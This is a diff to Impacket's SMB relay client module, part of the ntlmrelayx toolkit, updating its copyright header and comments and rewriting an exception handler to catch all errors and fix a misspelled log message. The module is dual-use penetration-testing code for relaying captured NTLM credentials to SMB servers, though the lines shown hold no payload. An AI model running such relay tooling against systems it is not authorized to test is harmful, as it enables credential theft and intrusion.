@@ -1,17 +1,19 @@
-# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+# Impacket - Collection of Python classes for working with network protocols.
 #
-# This software is provided under under a slightly modified version
+# Copyright (C) 2023 Fortra. All rights reserved.
+#
+# This software is provided under a slightly modified version
 # of the Apache Software License. See the accompanying LICENSE file
 # for more information.
 #
-# SMB Relay Protocol Client
+# Description:
+#   SMB Relay Protocol Client
+#   This is the SMB client which initiates the connection to an
+#   SMB server and relays the credentials to this server.
 #
 # Author:
-#  Alberto Solino (@agsolino)
+#   Alberto Solino (@agsolino)
 #
-# Description:
-#  This is the SMB client which initiates the connection to an
-# SMB server and relays the credentials to this server.
 
 import logging
 import os
@@ -276,14 +278,11 @@ class SMBRelayClient(ProtocolClient):
             packet = self.session.negotiateSessionWildcard(None, self.targetHost, self.targetHost, self.targetPort, 60, self.extendedSecurity,
                                                   flags1=SMB.FLAGS1_PATHCASELESS | SMB.FLAGS1_CANONICALIZED_PATHS,
                              flags2=flags2, data=data)
-        except socketerror as e:
-            if 'reset by peer' in str(e):
-                if not self.serverConfig.smb2support:
-                    LOG.error('SMBCLient error: Connection was reset. Possibly the target has SMBv1 disabled. Try running ntlmrelayx with -smb2support')
-                else:
-                    LOG.error('SMBCLient error: Connection was reset')
+        except Exception as e:
+            if not self.serverConfig.smb2support:
+                LOG.error('SMBClient error: Connection was reset. Possibly the target has SMBv1 disabled. Try running ntlmrelayx with -smb2support')
             else:
-                LOG.error('SMBCLient error: %s' % str(e))
+                LOG.error('SMBClient error: Connection was reset')
             return False
         if packet[0:1] == b'\xfe':
             preferredDialect = None
